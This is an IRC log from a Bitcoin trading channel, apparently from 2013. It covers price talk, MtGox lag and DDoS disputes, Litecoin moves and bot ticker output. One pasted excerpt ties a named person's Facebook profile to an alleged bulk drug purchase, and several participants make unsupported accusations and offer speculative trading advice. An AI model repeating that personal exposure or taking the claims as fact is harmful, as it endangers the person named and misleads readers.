definately btc value growth trying to correct. Apr 05 08:31:14 [BTCTC] [CRYPTO-TRADE] 1 @ 0.2 BTC [+] Apr 05 08:31:33 i think so Apr 05 08:31:37 too much too soon Apr 05 08:31:45 maybe crash, probably not Apr 05 08:32:16 distributing the load across the exchanges should prevent any actual crash Apr 05 08:32:35 I don't think so… if there were a crash, I think buyers would come out in droves.. Apr 05 08:32:52 the term crash is way overused Apr 05 08:33:00 I certainly would look to liquidate USD equities and move to btc. Apr 05 08:33:01 i doubt will see JUly 2011 again ever Apr 05 08:33:09 no more bitcoins for peenies Apr 05 08:33:25 as long as any exchange stays operational they are going to cost you a lot of money Apr 05 08:33:29 from now on Apr 05 08:34:02 If BTC becomes a true currency - as businesses slowly adopt it, you will have no reason to exchange them back for fiat Apr 05 08:34:04 i'm still half hoping the system wont collapse Apr 05 08:34:12 would be much better for everyone :( Apr 05 08:34:13 Or at least not everyone will Apr 05 08:34:17 btcguild troubles me at the moment Apr 05 08:34:30 taub: what do you mean by collapse? Apr 05 08:34:50 btcguild will self correct. Apr 05 08:35:07 do you know what happened when btcguild updated their bitcoind last Apr 05 08:35:14 Does anyone know exactly (or close) how big the annual drug trade market is? IE if they all started using bitcoin... Apr 05 08:35:17 i can tell you in case you don't know Apr 05 08:35:24 this was before they has asicminer Apr 05 08:35:40 [MPEX] [S.MPOE] 1300 @ 0.00070298 = 0.9139 BTC [-] Apr 05 08:35:41 [MPEX] [S.MPOE] 5750 @ 0.00070297 = 4.0421 BTC [-] Apr 05 08:35:43 [MPEX] [S.MPOE] 21200 @ 0.00069413 = 14.7156 BTC [-] Apr 05 08:35:45 [MPEX] [S.MPOE] 2847 @ 0.00068964 = 1.9634 BTC [-] Apr 05 08:35:46 i dont think endless spending and money printing can go on forever Apr 05 08:35:57 I know silkroad does about $29 million per month Apr 05 08:36:05 but overall it's in billions Apr 05 08:36:07 they updated their bitcoind on their pool but didn't let the db reindex first Apr 05 08:36:18 so miners were being given low diff shares Apr 05 08:36:24 until their wallet was empty Apr 05 08:36:38 what happens if they have 51%, fuck up, fork the chain Apr 05 08:36:43 hash a block Apr 05 08:36:52 it would only shift if cartels wanted to keep their stashes in btc.. and I'm not so sure that would be a good thing for btc… IE: governments might use an excuse to outlaw Apr 05 08:37:08 that's why btcguild worries me Apr 05 08:37:50 well, I suspect that miners will start moving to oz. Apr 05 08:39:21 SO for the sake of arguement… let's assume that btc goes up to 1000usd.. some in this channel think that would be horrible for the btc economy.. can some explain why? Apr 05 08:39:45 i don't think the price matters anymore Apr 05 08:39:47 it seems arbitrary... Apr 05 08:40:02 i dont think anyone argues that it's horrible in general Apr 05 08:40:14 mp seems more concerend about the rate it's increasing Apr 05 08:40:37 the price is so high now that mentally the decimal places have already started moving Apr 05 08:40:38 on what grounds? Apr 05 08:40:39 ie he doesnt want it to be volatile or full of bubbles and crashes Apr 05 08:40:45 so actual fungibility is being tested now Apr 05 08:40:47 because it scares people away Apr 05 08:41:16 so i don't see how 1000 matters Apr 05 08:41:18 but the issue is if it is in fact worth more and trying to correct.. Apr 05 08:41:21 it's a nother decimal place Apr 05 08:41:47 what's the visual and mental difference between .005 btc and .05 btc if they are fundamentally the same Apr 05 08:41:51 wouldn't it be better to get that correction out of the way and then let it try to stabialize? Apr 05 08:42:23 just throwing thoughts out there Apr 05 08:42:48 stabilize is sort of a funny word to use Apr 05 08:42:51 personally I kinda wish btc would stay really low so I can buy more.. Apr 05 08:42:57 sure, bubbles have to be corrected Apr 05 08:43:01 how do you stabilize a queue of 10,000 people wanting to buy something Apr 05 08:43:06 the thought is not to have bubble like growth to begin with Apr 05 08:43:07 more exchanges Apr 05 08:43:13 more everything Apr 05 08:43:16 that takes time Apr 05 08:43:24 why does more exchanges help? Apr 05 08:43:26 so expect one hell of a volatile ride Apr 05 08:43:41 because gox is asingle point of failure and it can't handle the load Apr 05 08:43:43 obviously Apr 05 08:43:48 they've said so themselves Apr 05 08:44:04 well.. they've said they can't handle ddos attacks Apr 05 08:44:10 there's needs to be 10x the number of operating exchanges there are now Apr 05 08:44:19 to handle the influx of users Apr 05 08:44:26 to stabilize the volatility Apr 05 08:44:28 not he price Apr 05 08:44:43 if you spread out to ten exchanges they'd all be semi-illiquid Apr 05 08:44:43 the price is going to do what the exchanges allow it to do Apr 05 08:44:51 the volatility comes from the stops/starts Apr 05 08:44:54 and emotions Apr 05 08:44:58 I don't think we need to exchanges. perhaps more money changers Apr 05 08:45:20 more retail Apr 05 08:45:31 more retail money exchangers Apr 05 08:45:39 that keep their own supplies Apr 05 08:45:58 they would go to a handful of exchanges for trade.. Apr 05 08:46:02 all of these things feed off each other. what hasn't kept up is the supply Apr 05 08:46:10 or dealers, exchanges Apr 05 08:46:16 btc supply? Apr 05 08:46:27 of course not, that's baked into the system Apr 05 08:46:30 the supply to "the market" Apr 05 08:46:47 whether that market is real or artificial doesn't matter Apr 05 08:46:54 but until recently it was gox Apr 05 08:47:01 and now it can't be gox alone anymore Apr 05 08:47:15 ah the supply of btc.. well with it going up people are reluctant to sell.. and many people will never sell.. Apr 05 08:47:46 the exchanges create the market or better the illusion of the market Apr 05 08:47:50 IE: They have moved to btc Apr 05 08:47:55 because money is an illusion Apr 05 08:48:32 a poorly represented market performs poorly Apr 05 08:48:58 wall street proper will invest in exchanges at some point.. IE: old financial houses. Apr 05 08:49:18 the oldest con in the book is to invent a problem and then sell the solution to it Apr 05 08:49:27 bit coin didn't invent the problem and it sells itself Apr 05 08:49:59 need more exchanges providing the illusion of stability Apr 05 08:50:05 and thus a stabler market Apr 05 08:50:24 mor people, more exchanges, higher price Apr 05 08:50:51 Apr 05 09:02:49 [MPEX] [S.MPOE] 20000 @ 0.00068871 = 13.7742 BTC [-] Apr 05 09:03:51 [MPEX] [S.MPOE] 4273 @ 0.00068871 = 2.9429 BTC [-] Apr 05 09:11:57 [MPEX] [S.MPOE] 1300 @ 0.00068762 = 0.8939 BTC [-] Apr 05 09:11:59 [MPEX] [S.MPOE] 2178 @ 0.00068761 = 1.4976 BTC [-] Apr 05 09:12:00 [MPEX] [S.MPOE] 8000 @ 0.00068575 = 5.486 BTC [-] Apr 05 09:12:02 [MPEX] [S.MPOE] 9400 @ 0.00068518 = 6.4407 BTC [-] Apr 05 09:12:03 [MPEX] [S.MPOE] 8322 @ 0.00068444 = 5.6959 BTC [-] Apr 05 09:12:50 [BTCTC] [COGNITIVE] 1 @ 0.15788 BTC [-] Apr 05 09:25:26 SO was thinking about the exchange problem… what if Morgan or Goldman bought half a million bitcoins and issued an ETF and let it trade on a standard stock exchange… It would kinda solve some problems, while creating new ones. Apr 05 09:26:09 the question is how could they acquire enough btc to do it without messing up the market. Apr 05 09:36:14 ;;ticker Apr 05 09:36:15 BTCUSD ticker | Best bid: 136.29992, Best ask: 136.80000, Bid-ask spread: 0.50008, Last trade: 136.29992, 24 hour volume: 67541.53345295, 24 hour low: 128.00100, 24 hour high: 142.12000, 24 hour vwap: 134.40464 Apr 05 09:46:01 [HAVELOCK] [SDICE] 8 @ 0.3381 = 2.7048 BTC [+] Apr 05 09:46:02 [HAVELOCK] [SDICE] 20 @ 0.33811 = 6.7622 BTC [+] Apr 05 09:46:03 [HAVELOCK] [SDICE] 20 @ 0.339 = 6.78 BTC [+] Apr 05 09:53:14 ;;ticker Apr 05 09:53:15 BTCUSD ticker | Best bid: 136.00001, Best ask: 136.69499, Bid-ask spread: 0.69498, Last trade: 136.69499, 24 hour volume: 67318.91118458, 24 hour low: 128.00100, 24 hour high: 142.12000, 24 hour vwap: 134.42469 Apr 05 10:02:01 [HAVELOCK] [SDICE] 27 @ 0.3391 = 9.1557 BTC [+] Apr 05 10:08:03 [MPEX] [S.MPOE] 2850 @ 0.00068603 = 1.9552 BTC [+] Apr 05 10:10:11 [BTCTC] [S.DICE-PT] 25 @ 0.00439 = 0.1098 BTC [-] Apr 05 10:22:03 hickAsThieves> going to bed, i expect you guys to get btc up to 140 while i sleep << and yet it's exactly 133 Apr 05 10:22:46 they've been doing this for 30 years tho << ya. but 30 years ago they had a productivr workforce. now they got suicidal teens and otaku young adults Apr 05 10:24:20 bgupta> SO for the sake of arguement… let's assume that btc goes up to 1000usd.. some in this channel think that would be horrible for the btc economy.. can some explain why? << read http://trilema.com/2013/its-been-an-epic-few-days-what-happened/ towards the middle Apr 05 10:24:23 it explains what's the problem Apr 05 10:29:01 [MPEX] [S.MPOE] 27550 @ 0.00068603 = 18.9001 BTC [+] Apr 05 10:29:07 You are claiming there was no DDOS on mtgox, and that it had no impact on price? Apr 05 10:29:18 Or am I misreading.. Apr 05 10:29:35 sounds like you are claiming sole responsibility for stopping rally Apr 05 10:29:49 [BTCTC] [S.DICE-PT] 19 @ 0.0045 = 0.0855 BTC [+] Apr 05 10:29:49 mk let me find that other one Apr 05 10:30:00 and that mtgox crashed under the load of people selling? Apr 05 10:30:16 yeah. Apr 05 10:30:24 [MPEX] [S.DICE] 406 @ 0.00313722 = 1.2737 BTC [-] Apr 05 10:30:30 that's actually what happened. Apr 05 10:31:15 Apr 05 06:06:48 mp, did you do a hacker bat signal to ddos mtgox on the rally to 147? Apr 05 10:31:15 Apr 05 06:09:00 http://pastebin.com/4SUXv67h Apr 05 10:31:17 that re the ddos. Apr 05 10:31:32 http://polimedia.us/dtng/c/src/136498390721.png that re the bubble deflation. Apr 05 10:31:50 [BTCTC] [ASICMINER-PT] 1 @ 0.7829 BTC [+] Apr 05 10:32:26 [BTCTC] [ASICMINER-PT] 1 @ 0.7829 BTC [+] Apr 05 10:37:03 ;; ticker Apr 05 10:37:04 BTCUSD ticker | Best bid: 136.00001, Best ask: 136.60000, Bid-ask spread: 0.59999, Last trade: 136.60000, 24 hour volume: 67059.71450567, 24 hour low: 128.00100, 24 hour high: 142.12000, 24 hour vwap: 134.51139 Apr 05 10:38:21 mircea_popescu: http://www.bitcoinrumors.com/2013/04/04/mtgox-announcement-on-ddos-attack/ Apr 05 10:39:04 what about that ? Apr 05 10:39:22 historically mtgox has been pretty transparant about owning up to their problems Apr 05 10:39:37 (After the fact) Apr 05 10:39:42 this is exactly opposite to reality, for one. Apr 05 10:39:56 You are basically saying they are now lying to the world. Apr 05 10:39:56 for the other, whats some random site trying to leech hits by republishing random content to dow ith anything ? Apr 05 10:40:06 they have an excellent history of lieing. Apr 05 10:40:38 They were very transparent about their screwups leading to the theft of a large amount of btc. Apr 05 10:41:25 and what they were doing to mitigate the issue Apr 05 10:41:28 https://bitcointalk.org/index.php?topic=157360.msg1670345#msg1670345 a fine example Apr 05 10:41:46 they are of the persuasion that pr is bullshit & lieing as much as possibkle. Apr 05 10:42:09 bgupta they were not transparent about either. they are not transparent now either. i have no idea what you are talking about. Apr 05 10:42:17 when mpex reported a ddos there was transparency. Apr 05 10:42:25 when mtgox hinted to a dddos there's nothing but pr fluff. Apr 05 10:44:14 "I won't bother to compile the endless list of proof to show you just lied" Why not? Apr 05 10:45:07 i guess she's lazy Apr 05 10:45:26 also we're not quite prepared for serving new people, what i'm saying here is common knowledge among "us". Apr 05 10:45:34 Your evidence that they lied is a post from you claiming that they lied.. oh, mpoe-pr isn't you? Apr 05 10:45:36 i'm not saying this to exclude you, just saying, this is all very banal crap Apr 05 10:45:52 are you following the forum at all ? Apr 05 10:46:27 For some reason I thought that it was you… since you are always linking to posts by said avatar. Apr 05 10:46:49 she's my forum pr. Apr 05 10:47:14 but if you're curious, do a search for mtgox, see what turns up. Apr 05 10:47:35 look for that classic piece on the part of inaba where he's been dicked around for months over 20k Apr 05 10:48:04 or for that piece where some new guy was complaining about mtgox telling him that his funds are locked and "they'll get in touch with the developers" to fix it. Apr 05 10:48:55 https://bitcointalk.org/index.php?topic=157360.msg1666644;topicseen#msg1666644 claims satisfaction rates of 90-95% which means that unsatisfaction rates are 5-10% Apr 05 10:49:06 which isn't really something to brag about Apr 05 10:49:10 but they are Apr 05 10:49:21 we are not discussing "satisfaction rate" Apr 05 10:49:39 we are discussing that mpex handles everything within the same day, and to counter this tux claiomed they do it in 20 minutes. Apr 05 10:49:47 except the forum is replete with cases they do no such thing. Apr 05 10:49:59 which makes him a liar (again, for that matter, no big deal, it's banal by now) Apr 05 10:51:05 they didn't say everything.. they said most.. my take is if they handle more than 50% in 20 minutes… that means that statement is correct.. the rest could take weeks/months. Apr 05 10:52:05 I don't yet see evidence of outright lying. Apr 05 10:52:22 tyhat is not what he said. Apr 05 10:52:33 what he said was : "Most open tickets have a resolution within 20 minutes. Remaining cases are when there is not enough information, or when issues are not simple user-specific issues (or linked to an outage)." Apr 05 10:52:52 This means that ALL tickets that are properly spelled out and affect a single user are handledwithin 20 mintes. Apr 05 10:53:13 it also means that the ONLY cases where a ticker takes over 20 minutes is when either a. there's no info or b. there's an outage and the ticket relates to the outage. Apr 05 10:53:20 reading is very important as a skill. Apr 05 10:54:21 well. I'd be curious to know what they mean by "simple user-specific issues" IE: Does that preclude "complicated user-specific issues"? Apr 05 10:54:55 heh. Apr 05 10:55:00 what i mean is : they are NOT transparent. Apr 05 10:55:09 they're horrible communicators, with a long history of such incompetence. Apr 05 10:55:26 that people in general read crap like their recent release and think something was said is a property of large crowds of people. Apr 05 10:55:28 nothing more. Apr 05 10:55:34 I don't read "when issues are not simple user-specific issues (or linked to an outage)" as "when issues are not simple user-specific issues that are linked to an outage" Apr 05 10:55:58 again, that's not what i said. Apr 05 10:56:07 it also means that the ONLY cases where a ticker takes over 20 minutes is when either a. there's no info or b. there's an outage and the ticket relates to the outage. Apr 05 10:56:09 or is an or. Apr 05 10:56:35 well, their PR matched my read on the situation, as a number of btc sites where were being hammered at that time. Apr 05 10:57:09 for a while. Apr 05 10:57:21 http://trilema.com/2013/boys-and-girls-i-got-news-were-being-probed/ Apr 05 10:57:26 this was being discussed two weeks ago. Apr 05 10:57:55 and they are still being useless. not saying anything concrete about the ddos Apr 05 10:58:03 makes them either dumb or pointless in this context. Apr 05 10:58:10 I'm reading it as we take care of simple issues in 20 minutes… complex issues or outage related issues exluded. Apr 05 10:58:26 let's see if they will.. what do you want to know? Apr 05 10:58:40 the list is in the article above. Apr 05 10:59:09 it says specifically what i wish from a service that aspires to be halpful. Apr 05 11:04:28 then again i guess that's asking a little much, they probably don't have the technical ability to do anything other than read tickets from their host. Apr 05 11:04:36 so they wouldn't kniow what to say anyway. Apr 05 11:09:42 I think that they are at a scale that they are using "helpdesk staff" that are largely following scripts. Apr 05 11:10:05 If it fits in script they can reply within 20 mins, if not it needs to be escalated Apr 05 11:10:25 (Saying this because I have worked in customer service orgs in the past. Apr 05 11:11:03 i know they have. Apr 05 11:11:15 (I was third level support, and it generally took a long time to get to my desk, and if it did it wasn't trivial to solve. Apr 05 11:11:17 but that doesn't give them license to lie about it. Apr 05 11:11:25 when i say you suck and mpex owns you, he says "this is true" Apr 05 11:11:28 that's telling the truth. Apr 05 11:11:37 wehn he comes back wityh "no we're better" he's getting the bitchslap. Apr 05 11:11:40 seems logical to me. Apr 05 11:12:09 obviously he doesn't have a prayer in hell to compete seeing how he handles < 1k and i do over 1k. of course my service would be better. Apr 05 11:12:13 nevertheless... it is what it is. Apr 05 11:13:15 well it depends on what your criteria of comparison is… If a pretty site is the criteria, they win.. if never having been hacked is the criteria you win. It's not balck or white. Apr 05 11:13:34 no. Apr 05 11:13:41 there are many other ways to measure.. those were just two examples. Apr 05 11:13:42 the criteria is having customers serviced within the day Apr 05 11:13:45 as the post delineated it Apr 05 11:13:50 i have no idea why this is so difficult. Apr 05 11:16:45 You guys don't even directly compete, so that makes comparison even harder. Anyway this is turning into a bit of a rathole.. IE: we are probably not going to change each others opinions. Apr 05 11:17:17 well, the thing is, i'm really uninterested in oppinions. i am stating facts. Apr 05 11:17:37 unlike oppinions, facts are verifiable. Apr 05 11:22:24 So are the bot algos relatively public? Trying to understand why some spreads are so wide and others aren't? Or are the less tight spreads situations were there is a human counterparties on the book? Apr 05 11:22:32 bbiab Apr 05 11:23:43 if you mean mpoe bot absolutely not public at all. Apr 05 11:28:51 [BTCTC] [ASICMINER-PT] 8 @ 0.77 = 6.16 BTC [-] Apr 05 11:28:54 [BTCTC] [ASICMINER-PT] 1 @ 0.769 BTC [-] Apr 05 11:28:57 [BTCTC] [ASICMINER-PT] 1 @ 0.769 BTC [-] Apr 05 11:29:03 [BTCTC] [ASICMINER-PT] 1 @ 0.7689 BTC [-] Apr 05 11:29:05 [BTCTC] [ASICMINER-PT] 20 @ 0.7671 = 15.342 BTC [-] Apr 05 12:20:11 [BTCTC] [CRYPTO-TRADE] 2 @ 0.2 = 0.4 BTC [+] Apr 05 12:21:00 [HAVELOCK] [SDICE] 25 @ 0.365 = 9.125 BTC [+] Apr 05 12:22:00 [HAVELOCK] [SDICE] 15 @ 0.365 = 5.475 BTC [+] Apr 05 12:22:39 [BTCTC] [S.DICE-PT] 1 @ 0.0045 BTC [+] Apr 05 12:24:28 ;;ticker Apr 05 12:24:29 BTCUSD ticker | Best bid: 137.50339, Best ask: 137.99979, Bid-ask spread: 0.49640, Last trade: 137.99979, 24 hour volume: 67917.79154725, 24 hour low: 128.00100, 24 hour high: 142.12000, 24 hour vwap: 134.97076 Apr 05 12:44:16 ;;bids 0 Apr 05 12:44:16 There are currently 31105962 bitcoins demanded at or over 0.0 USD, worth 10993520.0394 USD in total. | Data vintage: 40.9189 seconds Apr 05 12:55:46 what's the deal with this? http://coinlab.com/press I seem to still be able to directly access my mtgox account? Apr 05 12:55:51 [BTCTC] [ASICMINER-PT] 1 @ 0.7501 BTC [-] Apr 05 13:00:27 [BTCTC] [BTC-BOND] 10 @ 0.01 = 0.1 BTC [+] Apr 05 13:04:06 ;;goxlag Apr 05 13:04:07 MtGox lag is 0.270389 seconds. During this time, light travels 0.000541856528574 AU. You could have sent a bitcoin to the other side of the Earth, along the surface (0.0001339 AU). Apr 05 13:16:52 bgupta: seems no deal so far, at all Apr 05 13:17:14 wtf is up with LTC price Apr 05 13:17:16 they announced just move of "biggest account" Apr 05 13:17:32 links? Apr 05 13:19:14 does this mean its done? Apr 05 13:19:22 bgupta: http://coinlab.com/status Apr 05 13:20:17 KRS1337: imho just more people like me pulled out some ltcs from socks Apr 05 13:20:23 seems at some point it will come mandatory? Apr 05 13:20:51 dont understand Apr 05 13:21:19 KRS1337: i had quite a few ltcs bought year ago stashed at various places Apr 05 13:21:24 and recently sold some Apr 05 13:21:28 KRS1337: What is your question? IE: WHo are you talking to? Apr 05 13:21:36 jurov Apr 05 13:21:40 so more ppl did the same, i guess Apr 05 13:21:48 so jurov you aren't gonna wait to see if mtgox wil follow through? Apr 05 13:21:56 so the ltcs at BTC-e are worthless, but tthe ltc's at another exchange arent? Apr 05 13:22:13 bgupta, just get rid off mtgox completely. fortunately i'm not american, just following Apr 05 13:22:41 will I lose my btc investment too soon? wtf is going on Apr 05 13:22:48 great friday morning i woke up to Apr 05 13:22:53 imho coinlab hit some major snags with these alphas, hence no update Apr 05 13:23:04 ltc had rally on mtgox rumor/pseudo-news.. (that mtgox was gonna trade ltc) Apr 05 13:23:04 KRS1337: what??? Apr 05 13:23:20 jurov, where else can I trade btc with liqudity Apr 05 13:23:50 bgupta, trade mpex stocks instead :D Apr 05 13:24:03 jurov: idk..i see ltc tanking then i hear get away from gox..idk what to do Apr 05 13:24:13 and if you absolutely must trade btcusd, bitfloor seems to be rising. Apr 05 13:24:53 so i can probably transfer them to another exchange? I see people on btc-e losing their asses Apr 05 13:24:55 on ltc Apr 05 13:25:03 am trading AM but not trading on MPOE yet. Apr 05 13:25:04 KRS1337: just inform yourself at recent mtgox happenings. they are just seriously inept. Apr 05 13:25:13 and i never said anything about btc-e!!! Apr 05 13:25:47 i know..its just me Apr 05 13:26:05 KRS1337: Dude ltc hit an all time high on btc-e based on rumos that mtgox is gonna start allowing ltc trading there.. Apr 05 13:26:32 that's bs, it went up before that announcement Apr 05 13:26:34 it's pulled back quite a bit as people who bought ltc at very low prices are taking profits Apr 05 13:26:43 its all in the red Apr 05 13:26:47 low $3? Apr 05 13:28:41 i'm not going to predict anything. just don't panic and wait it out Apr 05 13:28:55 hmmm maybe i can buy a ton right now Apr 05 13:29:07 but when it slows down Apr 05 13:29:29 it is possible ltc will get more attractive since btc starts to be unusable for micropayments. or maybe not. Apr 05 13:32:07 KRS-1: it was below $.10 not that long ago.. Apr 05 13:32:55 KRS1337: to [ut it in perspective http://www.ltc-charts.com/period-charts.php?period=3-months&resolution=day&pair=ltc-btc&market=btc-e Apr 05 13:33:27 look at the chart and relax Apr 05 13:33:38 mk Apr 05 13:33:51 it's way more volitile than btc at the moment Apr 05 13:34:25 ya thats a good thing..i have no long term interest in ltc..just wanted to throw a buch down right quick but did not expect this Apr 05 13:34:51 buy or sell? Apr 05 13:35:04 what, ltc bubble popping ? Apr 05 13:37:04 yeh looks like value gone way done Apr 05 13:37:08 down Apr 05 13:39:44 [MPEX] [S.MPOE] 1300 @ 0.00070684 = 0.9189 BTC [+] Apr 05 13:39:44 [MPEX] [S.MPOE] 1300 @ 0.00070685 = 0.9189 BTC [+] Apr 05 13:39:46 [MPEX] [S.MPOE] 3400 @ 0.00070686 = 2.4033 BTC [+] Apr 05 13:41:04 if ltc moves to mtgox it will get some liquidity… can't say that will neccesarily help the price but it should be eaasier than btc-e Apr 05 13:42:33 mircea_popescu, talked last night with kakobrekla who recommended i ask you .. ive been putting in bets on bitbet.us and was wondering if you had any insight on why some get rejected? Apr 05 13:42:51 well, have you looked at the faq any ? Apr 05 13:42:53 wanted to refine my approach to help save us both time and put in better bet suggestions hah Apr 05 13:43:01 this is a merituous approach. Apr 05 13:43:01 read the faq, stay away from bad bets, something i would bet on Apr 05 13:43:14 right. pm some examples then Apr 05 13:43:28 KRS1337 maybe you're confusing price and value ? Apr 05 13:43:33 can i pm you the address ive been using? Apr 05 13:43:41 pretty much the one use of ltc that i can see atm is to play ponzi. do you see another ? Apr 05 13:43:52 joeykrim sure that works. Apr 05 13:43:58 sent thx Apr 05 13:48:56 yes mircea popescu i am Apr 05 13:49:01 mircea_popescu: Arguably one could have said the same about btc 3 years ago… IE: Many claimed btc was a big ponzi scheme that created value out of nothing.. I'm not convinced but there may be value in having more than one cc. Apr 05 13:49:24 maybe.. bgupta i think about that Apr 05 13:50:04 bgupta this is a broken argument. Apr 05 13:50:18 at the time people were saying that about btc 1. btc was unique and 2. they were being ignorant. Apr 05 13:50:38 at the time i'm saying this about ltc, 1. ltc is a copy of btc with no actual advantage and 2. i'm not ignorant. Apr 05 13:53:16 ;;ticker Apr 05 13:53:17 BTCUSD ticker | Best bid: 136.56113, Best ask: 136.90000, Bid-ask spread: 0.33887, Last trade: 136.90000, 24 hour volume: 68876.63929509, 24 hour low: 128.00100, 24 hour high: 142.12000, 24 hour vwap: 135.14460 Apr 05 13:53:20 morning all Apr 05 13:54:56 hya Apr 05 13:55:44 ;;bc,24hbrc Apr 05 13:55:45 Error: "bc,24hbrc" is not a valid command. Apr 05 13:55:49 hi all Apr 05 13:56:35 ello Apr 05 13:58:09 ;;bc,24hprc Apr 05 13:58:10 134.80 Apr 05 13:58:47 ;;goxlag Apr 05 13:58:48 MtGox lag is 0.702306 seconds. During this time, light travels 0.00140741336059 AU. You could have sent a bitcoin across the outer diameter of Saturn's rings (0.0024 AU). Apr 05 13:58:55 ;;ticker Apr 05 13:58:56 BTCUSD ticker | Best bid: 136.50000, Best ask: 136.99899, Bid-ask spread: 0.49899, Last trade: 136.50000, 24 hour volume: 69060.31474902, 24 hour low: 128.00100, 24 hour high: 142.12000, 24 hour vwap: 135.14890 Apr 05 13:59:34 ;;bids 0 Apr 05 13:59:36 There are currently 31113948 bitcoins demanded at or over 0.0 USD, worth 11041719.7415 USD in total. | Data vintage: 0.0106 seconds Apr 05 14:07:19 o look, 11 mn Apr 05 14:08:41 https://self-evident.org/?p=993 Apr 05 14:08:48 whoever is writing that please get better colors. Apr 05 14:10:01 if I want to sell btc but gox is lagging really bad does that mean i get a really bad market price or my sell orders might not go through? Apr 05 14:10:40 umm it means that you need to read what the difference is between a market order and a limit order Apr 05 14:11:25 KRS-1 use limit orders i guess Apr 05 14:11:30 yeah Apr 05 14:11:45 ;;goxlag Apr 05 14:11:45 MtGox lag is 15.922054 seconds. During this time, light travels 0.0319076179438 AU. You could have sent a bitcoin ten times between Earth and Moon (0.0257 AU). Apr 05 14:12:59 ok thanks Apr 05 14:13:17 I appreciate your insight Apr 05 14:13:56 ;;bc,stats Apr 05 14:13:59 Current Blocks: 229785 | Current Difficulty: 6695826.282596251 | Next Difficulty At Block: 229823 | Next Difficulty In: 38 blocks | Next Difficulty In About: 6 hours, 30 minutes, and 51 seconds | Next Difficulty Estimate: 7687054.9986 | Estimated Percent Change: 14.80368 Apr 05 14:14:22 ;;ticker Apr 05 14:14:23 BTCUSD ticker | Best bid: 137.50000, Best ask: 137.99900, Bid-ask spread: 0.49900, Last trade: 137.99999, 24 hour volume: 69290.11482755, 24 hour low: 128.00100, 24 hour high: 142.12000, 24 hour vwap: 135.16736 Apr 05 14:14:26 ;;goxlag Apr 05 14:14:27 MtGox lag is 1.238126 seconds. During this time, light travels 0.00248119064125 AU. You could have sent a bitcoin across the outer diameter of Saturn's rings (0.0024 AU). Apr 05 14:14:45 yes- limit order that is what i meant about my sell order not going through- market price is lower than my selling price at that moment, but my view to the actual market price is obscure Apr 05 14:15:08 this can cause a major sell mentality with people Apr 05 14:15:26 people are lemmings for the most part Apr 05 14:17:26 im not sure cloudflare KNOWS how to protect against dos, they just seem to put up a maint page if it gets too bad Apr 05 14:18:17 KRS1 they actually do and it's great value for price, but not very secure Apr 05 14:18:23 they MITM all your traffic Apr 05 14:18:40 yet when it gets too bad, it goes to their "offline" page Apr 05 14:18:47 scrat has it. Apr 05 14:19:02 its consumer doohickey, great for if your ex's nephew is ddosing your cooking blog Apr 05 14:19:10 right.. Apr 05 14:19:12 KRS1, i think you might only see that in one specific region until they re-route to another region Apr 05 14:19:21 that could be-yes Apr 05 14:19:29 or their customers are just not big enough?? Apr 05 14:19:43 big $ demands moar pipe? Apr 05 14:20:36 reminds me of back in the day with foonet mafia..its been a while. Apr 05 14:23:55 all these idiots thinking they're "journalists" Apr 05 14:23:57 it boggles the mind. Apr 05 14:27:27 lol someones about to buy 3900 namecoins for 30 btc Apr 05 14:28:01 today's fuckup: http://www.reddit.com/r/Bitcoin/comments/1bq2p8/coinbase_publishes_your_name_and_email_publicly/c98yibg Apr 05 14:28:05 what those are a dollar too ? Apr 05 14:28:12 bwahaha o gawd. Apr 05 14:28:14 sorry for incoming paste Apr 05 14:28:21 [14:22] http://www.facebook.com/harley.skyberg?ref=ts&fref=ts Apr 05 14:28:21 [14:22] bought Apr 05 14:28:21 [14:22] https://coinbase.com/checkouts/dd24f66b49e34b97d2bbe0e3a9a2eeb4 Apr 05 14:28:21 [14:22] 229BTC worth of a drug called ""AVALANCHE SPA POWDER"" - ie. the kind of quantity the feds might be interested in. Apr 05 14:28:21 [14:22] coinbase just ruined somebodies life Apr 05 14:28:40 hey mircea_popescu , ce faci? Apr 05 14:28:50 bine Apr 05 14:29:01 ouch Apr 05 14:29:20 they should just give me the 30 btc instead of buying namecoins, at least i'll talk dirty to them or something Apr 05 14:29:38 heeh Apr 05 14:30:44 Scrat i bet the forum will be full of people saying "thank you mpoe-pr for warning us not to trust these muppets a month ago" Apr 05 14:31:04 who the fuck is mpoe-pr, isn't that you? Apr 05 14:31:09 my pr. Apr 05 14:31:13 lol Apr 05 14:31:33 Bids now > $11.1MM Apr 05 14:31:44 Bugpowder and yet the price is going nowehre. Apr 05 14:32:13 so it wasn't gox doing it, it's not related to the dollars on the exhange, running out of theories here. Apr 05 14:32:58 haha scrat Apr 05 14:35:08 Bugpowder, yes, at those prices they bid at. Apr 05 14:35:40 mircea_popescu: I have a help request and project proposal for you. Apr 05 14:35:45 shoot. Apr 05 14:36:10 mircea_popescu: this summer I will work towards implementing a marketplace for BTC <-> LTC futures. Apr 05 14:36:15 KRS1 http://www.oreillynet.com/pub/a/network/2005/02/04/ddos.html btw Apr 05 14:36:26 mircea_popescu: Is that the kind of project that you would be interested in mentoring? Apr 05 14:36:42 are you hiring a consultant ? Apr 05 14:37:20 No, I intend to do all the research and coding myself - API + engine. The web front end will be done by friends. Apr 05 14:37:21 mircea popescu: yeah there was a lot of publicity on that..I'm good friends with the guy who caused it..it seems homeland security was on the same network he was killing for 3 weeks Apr 05 14:37:29 so they paid him a visit.. Apr 05 14:37:40 link is to charges dismissed. Apr 05 14:37:47 cads aha ok. Apr 05 14:37:52 noooo he went to prison.. Apr 05 14:37:59 the thing is..his company was getting DDoS'd and he was hitting them back, but 10X harder Apr 05 14:38:16 it was a big fiasco and admittedly exciting back then Apr 05 14:38:38 but... Apr 05 14:38:42 the link... Apr 05 14:39:15 mircea_popescu: I would not be able to pay you for your time. I would want to talk to you about high level architecture and implementation details. Apr 05 14:39:53 well, whatever you get away with leeching in public chan then i guess. Apr 05 14:39:54 yeah the link..i really can't explain it..i had to wait for Paul to get out, he told me about it..sucked..he did time. Apr 05 14:39:57 mircea_popescu: barring any formal mentorship/student relationship, I would like at least to ask you basic questions over the next few months. Apr 05 14:40:04 finance consulting is finance consulting, more expensive than hiring a lawyer, Apr 05 14:40:10 which is more expensive than going to the dentist Apr 05 14:41:04 I agree. I would be asking essentially for 'gratis' financial consulting. Not a winning proposition for you by any means. Apr 05 14:41:19 sounds like a great idea Apr 05 14:41:35 prolly needs a better model. Apr 05 14:42:00 in general this "i shall put together found items in the hope of constructing something of value" works fine if what you're doing is art projects in highschool. Apr 05 14:42:01 i think mp is saying you dont have to ask to ask, and he doesnt have to answer Apr 05 14:42:10 I in turn have some wonky ideas. I want to build the core engine in haskell. I want to release the software for free. I'd like to help run the 